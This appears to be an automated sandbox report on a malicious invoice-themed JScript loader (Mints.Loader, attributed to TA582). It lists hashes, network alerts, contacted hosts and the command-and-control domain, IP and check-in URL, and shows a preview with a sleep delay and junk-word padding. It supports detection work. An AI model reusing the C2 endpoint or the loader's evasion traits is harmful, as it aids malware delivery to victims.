            https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.google.com/preferences?hl=enXpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.000002490038E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://news.google.com/?tab=wnpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schema.org/WebPagepowershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F27000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.google.com/logos/doodles/2024/seasonal-holidays-2024powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1782264899.00000249018C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/finance?tab=wepowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://oneget.orgXpowershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.google.compowershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://apis.google.compowershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249003A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.0000024910010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1782264899.0000024900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.blogger.com/?tab=wjpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://play.google.com/?hl=en&tab=w8powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1782264899.00000249018C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249003A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.0000024910010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/url?q=https://notebooklm.google/audio%3Futm_source%3Dgoogle%26utm_medium%3Dhppowershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249003A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.0000024910010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1782264899.000002490186A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1782264899.000002490186A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://drive.google.com/?tab=wopowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://mail.google.com/mail/?tab=wmpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.google.com/preferences?hl=enpowershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1782264899.000002490186A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.youtube.com/?tab=w1powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://mbuzy3yvzw3r.toppowershell.exe, 00000003.00000002.1782264899.000002490132D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.google.com/history/optout?hl=enpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://books.google.com/?hl=en&tab=wppowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.google.com/&ec=GAZAAQpowershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://aka.ms/pscore68powershell.exe, 00000003.00000002.1782264899.0000024900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://oneget.orgpowershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          45.61.137.71
                                                                                                          mbuzy3yvzw3r.topUnited States
                                                                                                          40676AS40676USfalse
                                                                                                          142.250.201.4
                                                                                                          www.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1576661
                                                                                                          Start date and time:2024-12-17 11:30:10 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 3m 38s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:7
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • GSI enabled (Javascript)
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:Fattura72543461.js
                                                                                                          Detection:MAL
                                                                                                          Classification:mal92.expl.evad.winJS@4/5@2/2
                                                                                                          EGA Information:Failed
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 2
                                                                                                          • Number of non-executed functions: 1
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .js
                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 172.202.163.200
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: Fattura72543461.js
                                                                                                          TimeTypeDescription
                                                                                                          05:31:33API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          45.61.137.71Fattura60963242.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          M3rzaYgoAd.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          Fattura02609628.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          r63NANrAHS.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          6xKgZHxo9S.jsGet hashmaliciousUnknownBrowse
                                                                                                          • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          mbuzy3yvzw3r.topFattura60963242.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          M3rzaYgoAd.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          Fattura02609628.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          r63NANrAHS.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          6xKgZHxo9S.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          AS40676USFattura60963242.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          M3rzaYgoAd.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          Fattura02609628.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          r63NANrAHS.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          6xKgZHxo9S.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 45.61.137.71
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                          MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                          SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                          SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                          SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:@...e.................................&..............@..........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.7138891553585003
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:TGZClP8h2kvhkvCCtYhvlPsHYavlPNHYy:TGYPAiYhvravgy
                                                                                                          MD5:17D5E8AD2FCC474E808FFDC5EB603737
                                                                                                          SHA1:241EE27100F74E4A194EE0F421B5CDF0FE5FFB78
                                                                                                          SHA-256:6872270B6672F919AA1C8D340C871AA5D902EFC755863B5FD721D7E717A288A5
                                                                                                          SHA-512:5C5EB4FBB48BFFC0FC2509E9CA512F781299B9459321EDBA954FF1736EC75FC992A2B918B72FD5A41F1528F675236162765E4FBB2F0ADA2379C60884EAA533C3
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......Yd...iY..nP..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...y8..nP.....nP......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.S..........................d...A.p.p.D.a.t.a...B.V.1......Y.S..Roaming.@......EW)B.Y.S..........................._..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.S............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.S.............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.S....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.S....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.S.....0..........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.7138891553585003
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:TGZClP8h2kvhkvCCtYhvlPsHYavlPNHYy:TGYPAiYhvravgy
                                                                                                          MD5:17D5E8AD2FCC474E808FFDC5EB603737
                                                                                                          SHA1:241EE27100F74E4A194EE0F421B5CDF0FE5FFB78
                                                                                                          SHA-256:6872270B6672F919AA1C8D340C871AA5D902EFC755863B5FD721D7E717A288A5
                                                                                                          SHA-512:5C5EB4FBB48BFFC0FC2509E9CA512F781299B9459321EDBA954FF1736EC75FC992A2B918B72FD5A41F1528F675236162765E4FBB2F0ADA2379C60884EAA533C3
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......Yd...iY..nP..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...y8..nP.....nP......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.S..........................d...A.p.p.D.a.t.a...B.V.1......Y.S..Roaming.@......EW)B.Y.S..........................._..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.S............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.S.............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.S....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.S....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.S.....0..........
                                                                                                          File type:ASCII text, with very long lines (568), with CRLF line terminators
                                                                                                          Entropy (8bit):4.517925653495695
                                                                                                          TrID:
                                                                                                            File name:Fattura72543461.js
                                                                                                            File size:100'284 bytes
                                                                                                            MD5:40ef9511d762c47c5876246943671176
                                                                                                            SHA1:e1bc94a2f751ddc15f9aeb28c88ecb9b79ed36cd
                                                                                                            SHA256:0c5c602416e2297e797efae478763caeef6f0e5f49fc21e6877f765d852680a9
                                                                                                            SHA512:4fcc20703ce00cf38efc734c6cdc9d053c8a52359c484836f22a586293e2da3960888651d268257a8e61827773b292bf9c94adc456c8b67e95384da0242874f8
                                                                                                            SSDEEP:768:X4mI4mC4m1Y2Y25uY4YdYrq3t4moYI5uZ24mC4mO2Bvvvl4mg2Bv4mOvvf2BvvvM:u
                                                                                                            TLSH:DFA38575DF76137A4B03094E79938197C98D66191220270BB6AC533CB37389C16FAEEB
                                                                                                            File Content Preview:WScript.Sleep(25000);..// portrayers timing gust hamza scamsters gomeral mediatizes annoy thermidor sabotaged kilolitres orismology pitchpoled magdalene acrider screed frore vermiculite finds feminine shebeans aediles chronologically butterburs vitrioling
                                                                                                            Icon Hash:68d69b8bb6aa9a86
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-17T11:31:37.466142+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.84970845.61.137.7180TCP
                                                                                                            2024-12-17T11:31:37.466142+01002057743ET MALWARE TA582 CnC Checkin1192.168.2.84970845.61.137.7180TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 17, 2024 11:31:35.701267958 CET4970880192.168.2.845.61.137.71
                                                                                                            Dec 17, 2024 11:31:35.821324110 CET804970845.61.137.71192.168.2.8
                                                                                                            Dec 17, 2024 11:31:35.821404934 CET4970880192.168.2.845.61.137.71
                                                                                                            Dec 17, 2024 11:31:35.824373007 CET4970880192.168.2.845.61.137.71
                                                                                                            Dec 17, 2024 11:31:35.944446087 CET804970845.61.137.71192.168.2.8
                                                                                                            Dec 17, 2024 11:31:37.415682077 CET804970845.61.137.71192.168.2.8
                                                                                                            Dec 17, 2024 11:31:37.466141939 CET4970880192.168.2.845.61.137.71
                                                                                                            Dec 17, 2024 11:31:37.558659077 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:37.678625107 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:37.678772926 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:37.678965092 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:37.799664974 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091379881 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091440916 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091478109 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091511011 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091543913 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091593981 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091628075 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091628075 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.091628075 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.091666937 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091675043 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.091711998 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.091811895 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.091849089 CET8049709142.250.201.4192.168.2.8
